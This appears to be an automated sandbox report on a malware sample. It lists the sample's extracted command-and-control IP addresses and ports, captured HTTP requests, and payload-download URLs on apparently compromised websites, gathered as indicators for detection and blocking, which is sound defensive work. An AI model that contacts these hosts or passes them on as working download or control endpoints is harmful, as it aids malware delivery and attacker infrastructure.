Source: Malware configuration extractor	IPs: 169.57.156.166:8080
Source: Malware configuration extractor	IPs: 107.170.39.149:8080
Source: Malware configuration extractor	IPs: 103.43.75.120:443
Source: Malware configuration extractor	IPs: 91.207.28.33:8080
Source: Malware configuration extractor	IPs: 213.239.212.5:443
Source: Malware configuration extractor	IPs: 45.235.8.30:8080
Source: Malware configuration extractor	IPs: 119.59.103.152:8080
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 95.217.221.146:8080
Source: Malware configuration extractor	IPs: 153.126.146.25:7080
Source: Malware configuration extractor	IPs: 197.242.150.244:8080
Source: Malware configuration extractor	IPs: 202.129.205.3:8080
Source: Malware configuration extractor	IPs: 103.132.242.26:8080
Source: Malware configuration extractor	IPs: 139.59.126.41:443
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 183.111.227.137:8080
Source: Malware configuration extractor	IPs: 5.135.159.50:443
Source: Malware configuration extractor	IPs: 201.94.166.162:443
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 79.137.35.198:8080
Source: Malware configuration extractor	IPs: 172.105.226.75:8080
Source: Malware configuration extractor	IPs: 94.23.45.86:4143
Source: Malware configuration extractor	IPs: 115.68.227.76:8080
Source: Malware configuration extractor	IPs: 153.92.5.27:8080
Source: Malware configuration extractor	IPs: 167.172.253.162:8080
Source: Malware configuration extractor	IPs: 188.44.20.25:443
Source: Malware configuration extractor	IPs: 147.139.166.154:8080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 185.4.135.165:8080
Source: Malware configuration extractor	IPs: 45.176.232.124:443

Source: Joe Sandbox View

ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic

HTTP traffic detected: POST /wviitvvypaw/exnwmeb/fqgitydelxiavmv/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56

Source: Joe Sandbox View

IP Address: 110.232.117.186 110.232.117.186

Source: global traffic

HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org

Source: global traffic	TCP traffic: 192.168.2.7:49705 -> 91.121.146.47:8080
Source: global traffic	TCP traffic: 192.168.2.7:49707 -> 66.228.32.31:7080
Source: global traffic	TCP traffic: 192.168.2.7:49710 -> 167.172.199.165:8080
Source: global traffic	TCP traffic: 192.168.2.7:49715 -> 104.168.155.143:8080
Source: global traffic	TCP traffic: 192.168.2.7:49716 -> 163.44.196.120:8080
Source: global traffic	TCP traffic: 192.168.2.7:49717 -> 160.16.142.56:8080
Source: global traffic	TCP traffic: 192.168.2.7:49722 -> 159.65.88.10:8080

Source: unknown

Network traffic detected: IP country count 17

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown	TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown	TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65

Source: wscript.exe, 0000000A.00000003.351129018.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329298977.0000000005955000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354489899.000000000595B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.0000000005955000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353306127.0000000005959000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.434013590.0000000001114000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.410330799.0000000001109000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 0000000D.00000003.434013590.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.410330799.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.00000000010CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 0000000D.00000003.434013590.0000000001114000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.410330799.0000000001109000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.13.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000D.00000003.434013590.0000000001114000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.410330799.0000000001109000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0C
Source: wscript.exe, 0000000A.00000002.354280215.0000000005862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349730028.000000000585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ozmeydan.com/cekici
Source: wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.0000000005685000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ozmeydan.com/cekici/9/
Source: wscript.exe, 0000000A.00000002.353883825.000000000307D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353398614.000000000307C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ozmeydan.com/cekici/9/jn7
Source: wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ozmeydan.com/cekici/9/xM
Source: wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.0000000005685000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
Source: wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
Source: wscript.exe, 0000000A.00000003.332245855.0000000003119000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003119000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com
Source: wscript.exe, 0000000A.00000003.338584714.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.352714501.0000000005568000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-
Source: wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.0000000005685000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
Source: wscript.exe, 0000000A.00000003.350604005.000000000511B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0
Source: wscript.exe, 0000000A.00000003.349340106.000000000587E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/i
Source: wscript.exe, 0000000A.00000003.346976631.000000000584E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349194761.000000000586D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/j2
Source: wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350018876.00000000058A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349899661.000000000588F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/s
Source: wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
Source: regsvr32.exe, 0000000D.00000002.572469448.00000000010C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://100.16.142.56:8080/
Source: regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://104.168.155.143:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/
Source: regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://104.168.155.143:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/A4
Source: regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.65.88.10:8080/
Source: regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.65.88.10:8080/hJ
Source: regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/
Source: regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/%4
Source: regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv//
Source: regsvr32.exe, 0000000D.00000002.572469448.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/=
Source: regsvr32.exe, 0000000D.00000002.572469448.000000000115C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/Xa4
Source: regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.65.88.10:8080/xJ
Source: regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.89.202.34/cH
Source: regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://159.89.202.34/wviitvvypaw/exnwmeb/fqgitydelxiavmv/
Source: regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://160.16.142.56:8080/
Source: regsvr32.exe, 0000000D.00000002.572469448.000000000115C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://160.16.142.56:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/
Source: regsvr32.exe, 0000000D.00000002.572469448.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://163.44.196.120:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/
Source: regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://163.44.196.120:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/H
Source: regsvr32.exe, 0000000D.00000002.572469448.00000000010CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://169.65.88.10:8080/
Source: regsvr32.exe, 0000000D.00000003.434013590.0000000001114000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/
Source: regsvr32.exe, 0000000D.00000003.434013590.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/wviitvvypaw/exnwmeb/fqgitydelxiavmv/
Source: regsvr32.exe, 0000000D.00000003.434013590.0000000001114000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://66.228.32.31:7080/
Source: regsvr32.exe, 0000000D.00000003.434013590.0000000001114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://66.228.32.31:7080/f
Source: regsvr32.exe, 0000000D.00000002.572082302.000000000107B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.121.146.47:8080/Y
Source: regsvr32.exe, 0000000D.00000002.572082302.000000000107B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.121.146.47:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/
Source: regsvr32.exe, 0000000D.00000003.410626582.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.121.146.47:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/=
Source: wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354280215.0000000005862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
Source: wscript.exe, 0000000A.00000003.353391125.0000000003093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.353921759.0000000003094000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/temobj
Source: wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
Source: wscript.exe, 0000000A.00000003.351377227.0000000005931000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329298977.000000000591F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354439210.0000000005932000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.0000000005928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/
Source: wscript.exe, 0000000A.00000002.354455582.0000000005947000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.351226281.0000000005947000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329298977.0000000005947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/V
Source: wscript.exe, 0000000A.00000003.353412277.000000000574F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8
Source: wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350748133.0000000003004000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354280215.0000000005862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.352989899.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
